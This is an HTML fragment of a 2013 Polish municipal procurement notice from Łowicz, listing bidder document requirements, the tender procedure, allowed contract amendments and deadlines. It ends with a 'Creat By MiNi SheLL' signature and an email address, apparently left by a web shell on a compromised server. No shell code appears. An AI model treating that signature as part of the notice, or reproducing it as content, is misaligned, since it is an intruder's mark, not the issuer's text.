<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p><br>1.Wypełniony i podpisany formularz oferty wraz z załącznikiem  do oferty pn. Tabela elementów rozliczeniowych, wg załącznika nr 1  nr 1a do IDW.
<br>2.Dowód  wniesienia wadium.
<br>3.Zgodnie z art. 23 ust. 1 PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego oraz załączają odpowiedni dokument o ustanowieniu Pełnomocnika (oryginał pełnomocnictwa lub odpis notarialny, określający zakres czynności prawnych, do których upoważniony jest pełnomocnik).  Pełnomocnictwo winno zawierać zapis o odpowiednim umocowaniu do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy. Zaleca się aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><br>Zamawiający dopuszcza możliwość zmiany postanowień umowy o realizację  niniejszego zamówienia publicznego w zakresie:
<br>zmiany ceny, która może nastąpić w sytuacji zmniejszenia lub zwiększenia zakresu rzeczowego przewidzianego do wykonania zamówienia w umowie oraz innych opisanych w niniejszym paragrafie
<br>2.zmiany ceny, która może nastąpić w wyniku zmiany ceny za nadzór autorski, która może  podlegać rewaloryzacji o rzeczywiste wskaźniki inflacji   w latach od  roku uzyskania pozwolenia na budowę do roku  rozpoczęcia budowy
<br>3.zmiany zakresu rzeczowego umowy, która może nastąpić w sytuacji konieczności zmniejszenia lub zwiększenia zakresu rzeczowego przewidzianego do wykonania zamówienia w umowie,
<br>4.zmiany terminu realizacji przedmiotu zamówienia wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być jedynie okolicznościami leżącymi po stronie Zamawiającego lub okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy, takimi jak:
<br>- rozszerzenie zakresu rzeczowego przewidzianego do wykonania zamówienia w umowie o prace dodatkowe konieczne do jego prawidłowego wykonania
<br>- wystąpienia opóźnień podczas pozyskiwania dokumentów formalno-prawnych od organów administracji publicznej oraz uzgodnień użytkownika infrastruktury na terenie objętym przedmiotem zamówienia. Zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję, w szczególności:
<br>- przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp.
<br>- odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, w tym brak możliwości pozyskania nieruchomości na cele budowlane wynikające z charakteru inwestycji z powodów niezależnych od Wykonawcy wynikających z niemożności ustalenia prawnego właściciela nieruchomości, braku akceptacji właściciela 
na rozwiązania projektowe dla danej nieruchomości, braku zgody danego właściciela na dysponowanie jego nieruchomością na cele budowlane.
<br>- regulacje prawne wprowadzone w życie po dacie podpisania umowy, mających wpływ na opracowanie dokumentacji wywołujące potrzebne zmiany umowy, wraz ze skutkami wprowadzenia takiej zmiany 
<br>- istotne zmiany norm mających zastosowanie do przedmiotu umowy
<br>5.zmiany obowiązującej stawki VAT (w przypadku zmiany powszechnie obowiązujących przepisów w zakresie wysokości stawki podatku od towarów i usług na przedmiot umowy) z tym, że wynagrodzenie brutto pozostanie niezmienione
<br>6.zmiany świadczenia Wykonawcy na świadczenie lepszej jakości przy zachowaniu tożsamości przedmiotu świadczenia
<br>7.formy zabezpieczenia należytego wykonania umowy
<br>8.oznaczenia danych dotyczących Zamawiającego i lub Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy)
<br>9.konieczności zmiany osób odpowiedzialnych za wykonanie umowy
<br>10.wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy w terminie określonym umową, 
<br>W przypadku konieczności wprowadzenia zmian do umowy na skutek zaistnienia w/w okoliczności Strona, która poweźmie o nich wiadomość zobowiązana jest niezwłocznie, nie później niż w terminie 7 dni poinformować o tym pisemnie drugą Stronę
<br>W przypadku zaistnienia sytuacji opisanych powyżej, obie strony muszą wyrazić zgodę na wniesienie zmian w zapisie umowy. Zmiana umowy wymaga formy pisemnej w postaci aneksu pod rygorem jej nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lowicz.eu    , http://www.zuk.bip.lowicz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> <br>Zakład Usług Komunalnych w Łowiczu, ul. Armii Krajowej 2b, 99-400 Łowicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 10:00, miejsce: <br>Zakład Usług Komunalnych w Łowiczu, ul. Armii Krajowej 2b, 99-400 Łowicz- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com